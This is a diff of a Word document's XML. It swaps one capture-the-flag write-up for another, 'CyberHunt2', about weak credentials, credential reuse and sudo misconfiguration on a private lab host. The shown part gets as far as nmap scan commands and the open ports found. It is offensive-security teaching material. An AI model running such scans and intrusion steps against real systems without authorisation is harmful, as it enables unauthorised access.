--- a/Doc1.docx
+++ b/Doc1.docx
@@ -156,7 +156,7 @@
                                     <w:tag w:val=""/>
                                     <w:id w:val="-650599894"/>
                                     <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:PublishDate[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
-                                    <w:date w:fullDate="2026-02-26T00:00:00Z">
+                                    <w:date w:fullDate="2026-03-02T00:00:00Z">
                                       <w:dateFormat w:val="M/d/yyyy"/>
                                       <w:lid w:val="en-US"/>
                                       <w:storeMappedDataAs w:val="dateTime"/>
@@ -180,23 +180,7 @@
                                           <w:sz w:val="28"/>
                                           <w:szCs w:val="28"/>
                                         </w:rPr>
-                                        <w:t>2/2</w:t>
-                                      </w:r>
-                                      <w:r>
-                                        <w:rPr>
-                                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-                                          <w:sz w:val="28"/>
-                                          <w:szCs w:val="28"/>
-                                        </w:rPr>
-                                        <w:t>6</w:t>
-                                      </w:r>
-                                      <w:r>
-                                        <w:rPr>
-                                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-                                          <w:sz w:val="28"/>
-                                          <w:szCs w:val="28"/>
-                                        </w:rPr>
-                                        <w:t>/2026</w:t>
+                                        <w:t>3/2/2026</w:t>
                                       </w:r>
                                     </w:p>
                                   </w:sdtContent>
@@ -3484,7 +3468,7 @@
                               <w:tag w:val=""/>
                               <w:id w:val="-650599894"/>
                               <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:PublishDate[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
-                              <w:date w:fullDate="2026-02-26T00:00:00Z">
+                              <w:date w:fullDate="2026-03-02T00:00:00Z">
                                 <w:dateFormat w:val="M/d/yyyy"/>
                                 <w:lid w:val="en-US"/>
                                 <w:storeMappedDataAs w:val="dateTime"/>
@@ -3508,23 +3492,7 @@
                                     <w:sz w:val="28"/>
                                     <w:szCs w:val="28"/>
                                   </w:rPr>
-                                  <w:t>2/2</w:t>
-                                </w:r>
-                                <w:r>
-                                  <w:rPr>
-                                    <w:color w:val="FFFFFF" w:themeColor="background1"/>
-                                    <w:sz w:val="28"/>
-                                    <w:szCs w:val="28"/>
-                                  </w:rPr>
-                                  <w:t>6</w:t>
-                                </w:r>
-                                <w:r>
-                                  <w:rPr>
-                                    <w:color w:val="FFFFFF" w:themeColor="background1"/>
-                                    <w:sz w:val="28"/>
-                                    <w:szCs w:val="28"/>
-                                  </w:rPr>
-                                  <w:t>/2026</w:t>
+                                  <w:t>3/2/2026</w:t>
                                 </w:r>
                               </w:p>
                             </w:sdtContent>
@@ -4000,7 +3968,7 @@
                                         <w:sz w:val="72"/>
                                         <w:szCs w:val="72"/>
                                       </w:rPr>
-                                      <w:t>4</w:t>
+                                      <w:t>5</w:t>
                                     </w:r>
                                   </w:sdtContent>
                                 </w:sdt>
@@ -4104,7 +4072,7 @@
                                   <w:sz w:val="72"/>
                                   <w:szCs w:val="72"/>
                                 </w:rPr>
-                                <w:t>4</w:t>
+                                <w:t>5</w:t>
                               </w:r>
                             </w:sdtContent>
                           </w:sdt>
@@ -4173,98 +4141,190 @@
     </w:sdt>
     <w:p>
       <w:pPr>
-        <w:rPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>ThunderCipher – A02-Misconfig Writeup</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
+        <w:t>CyberHunt2 – Writeup</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
         <w:t>Difficulty:</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
         <w:t xml:space="preserve"> Easy</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
         <w:t>Category:</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Web Exploitation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Linux / Network Exploitation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
         <w:t>Vulnerability:</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> OWASP A02 – Security Misconfiguration</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Weak Credentials + Credential Reuse + Sudo Misconfiguration</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
         <w:t>Target IP:</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> 192.168.5.84</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Port:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> 80</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>192.168.5.183</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Open Ports:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>21, 80, 7223</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:noProof/>
+          <w:color w:val="EE0000"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23ECD88A" wp14:editId="54F55D29">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37D23640" wp14:editId="7E7B9D9D">
             <wp:extent cx="5731510" cy="2820670"/>
             <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="942906036" name="Picture 28"/>
+            <wp:docPr id="1595428580" name="Picture 28"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -4272,7 +4332,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="942906036" name="Picture 942906036"/>
+                    <pic:cNvPr id="1595428580" name="Picture 1595428580"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -4303,464 +4363,317 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
         </w:rPr>
         <w:t>Challenge Description</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>Welcome to A02-Misconfig, a web application affected by Security Misconfiguration vulnerabilities.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The application appears to be a normal production-ready platform. The login works. The dashboard loads. Everything seems secure… or does it?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The objective of this challenge was to enumerate the application and identify security misconfigurations leading to sensitive information disclosure and privilege escalation.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>CyberHunt2 is a network-based challenge focusing on exposed services and weak credentials. The objective is to enumerate open services, identify misconfigurations, reuse discovered credentials, and escalate privileges to obtain both user and root flags.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>The hint suggests that weak credentials left during testing may lead to system compromise.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Enumeration Phase</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Step 1 –</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+        <w:t>Initial Port Scanning</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Performed initial scan:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap 192.168.5.183 -sV</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -sS -A</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Open ports discovered:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>21 (FTP)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>80 (HTTP)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:noProof/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Methodology</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Port Scanning</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Service Enumeration</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Directory Brute Forcing</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Sensitive File Analysis</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Source Code Inspection</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Credential Exploitation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Admin Panel Access</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Phase 1 –</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Port Scanning</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Tool </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Used:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Nmap</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Command </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Used:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap 192.168.5.84 -sV -A</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
